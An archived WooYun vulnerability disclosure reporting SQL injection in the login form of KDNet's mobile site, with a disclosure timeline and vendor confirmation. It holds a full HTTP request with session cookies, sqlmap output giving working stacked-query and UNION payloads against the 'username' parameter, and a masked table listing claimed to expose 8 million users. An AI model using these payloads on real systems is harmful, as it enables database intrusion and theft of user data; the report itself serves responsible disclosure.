乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-02: 厂商已经确认,细节仅向厂商公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
http://wap.kdnet.net/
POST /index.php?t=user-login HTTP/1.1Host: wap.kdnet.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://wap.kdnet.net/?t=user-lfCookie: kd_sessionid=355ef2041bc34819c379029c33839cf9; kdnet%5Fuser%5Fintegral=100; kd%5Fsessionid=355ef2041bc34819c379029c33839cf9; PHPSESSID=ditb3l9lrl1ra595o600h0dbu5Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 46password=g00dPa$$w0rD&t=user-login&username=1
username参数
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries Payload: password=g00dPa$$w0rD&t=user-login&username=1%'; IF(4600=4600) SELECT 4600 ELSE DROP FUNCTION GxSH-- Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: password=g00dPa$$w0rD&t=user-login&username=1%' UNION ALL SELECT CHAR(113)+CHAR(121)+CHAR(115)+CHAR(122)+CHAR(113)+CHAR(109)+CHAR(66)+CHAR(111)+CHAR(81)+CHAR(72)+CHAR(87)+CHAR(116)+CHAR(76)+CHAR(103)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(113),NULL,NULL,NULL-- ---web application technology: PHP 5.4.22, Apache 2.2.3back-end DBMS: Microsoft SQL Server 2008Database: catnewbbs[267 tables] mask 区域 *****--------**********apps **********mmend **********k ********** ********** ********** ********** **********r **********r ********** ********** ********** ********** ********** ********** ********** ********** ********** **********pwReset **********Reset **********Reset ********** **********e ********** **********20110811**********20111021**********ral_Leve**********ral_Leve********** ********** ********** ********** ********** ********** ********** ********** ********** **********ssion ********** ********** ********** ********** **********nfo ********** **********tion ********** ********** **********le ********** **********8 **********8 **********13 **********13 **********k **********sender **********l ********** ********** ********** **********cq **********cq **********sunny ********** ********** ********** ********** ********** ********** **********h ********** ********** ********** ********** ********** ********** **********Tmp2 **********Tmp2 ********** ********** **********26 **********26 **********09 ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********s **********k ********** **********eValue1 **********eValue1 ********** ********** ********** ********** ********** **********e ********** **********il **********t_settin**********ic ********** ********** ********** **********20120625********** **********tails **********tails ********** ********** ********** ********** **********c_desc ********** ********** ********** **********d_type **********d_type ********** ********** **********bak1 **********bak1 **********bak1 ********** ********** ********** **********a ********** ********** ********** **********assify ********** ********** **********ata **********data1 **********ods ********** ********** **********ak **********ak ********** ********** ********** ********** **********rnews_hi**********rnews_hi********** ********** ********** **********sttel **********sttel **********stuid **********s ********** ********** ********** **********l **********l ********** **********124 **********124 ********** ********** ********** **********ery **********_bit **********_bit **********rname **********lintegra**********eryadd ********** ********** ********** ********** ********** ********** **********ls ********** ********** ********** ********** ********** ********** ********** ********** **********ev **********ev **********og ********** ********** **********ji **********anji **********gin ********** ********** ********** ********** **********type ********** ********** ********** ********** ********** ********** ********** **********ompany **********vating **********ine_limi**********back **********email_ev**********form_bin**********n_userid********** **********ist_hist**********ist_hist**********ds **********c_img ********** **********ist_hist**********ist_hist**********count **********count **********story **********fei ********** ********** ********** ********** **********small ********** ********** ********** **********egister ********** **********ylist ********** ********** ********** ********** ********** ********** **********121017 **********0140124 **********0140124 ********** **********d ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********ails **********ails ********** ********** ********** **********-------*****
*****--------**********apps **********mmend **********k ********** ********** ********** ********** **********r **********r ********** ********** ********** ********** ********** ********** ********** ********** ********** **********pwReset **********Reset **********Reset ********** **********e ********** **********20110811**********20111021**********ral_Leve**********ral_Leve********** ********** ********** ********** ********** ********** ********** ********** ********** **********ssion ********** ********** ********** ********** **********nfo ********** **********tion ********** ********** **********le ********** **********8 **********8 **********13 **********13 **********k **********sender **********l ********** ********** ********** **********cq **********cq **********sunny ********** ********** ********** ********** ********** ********** **********h ********** ********** ********** ********** ********** ********** **********Tmp2 **********Tmp2 ********** ********** **********26 **********26 **********09 ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********s **********k ********** **********eValue1 **********eValue1 ********** ********** ********** ********** ********** **********e ********** **********il **********t_settin**********ic ********** ********** ********** **********20120625********** **********tails **********tails ********** ********** ********** ********** **********c_desc ********** ********** ********** **********d_type **********d_type ********** ********** **********bak1 **********bak1 **********bak1 ********** ********** ********** **********a ********** ********** ********** **********assify ********** ********** **********ata **********data1 **********ods ********** ********** **********ak **********ak ********** ********** ********** ********** **********rnews_hi**********rnews_hi********** ********** ********** **********sttel **********sttel **********stuid **********s ********** ********** ********** **********l **********l ********** **********124 **********124 ********** ********** ********** **********ery **********_bit **********_bit **********rname **********lintegra**********eryadd ********** ********** ********** ********** ********** ********** **********ls ********** ********** ********** ********** ********** ********** ********** ********** **********ev **********ev **********og ********** ********** **********ji **********anji **********gin ********** ********** ********** ********** **********type ********** ********** ********** ********** ********** ********** ********** **********ompany **********vating **********ine_limi**********back **********email_ev**********form_bin**********n_userid********** **********ist_hist**********ist_hist**********ds **********c_img ********** **********ist_hist**********ist_hist**********count **********count **********story **********fei ********** ********** ********** ********** **********small ********** ********** ********** **********egister ********** **********ylist ********** ********** ********** ********** ********** ********** **********121017 **********0140124 **********0140124 ********** **********d ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********ails **********ails ********** ********** ********** **********-------*****
800万用户信息:
危害等级:中
漏洞Rank:10
确认时间:2015-09-02 11:04
感谢对凯迪网络支持
暂无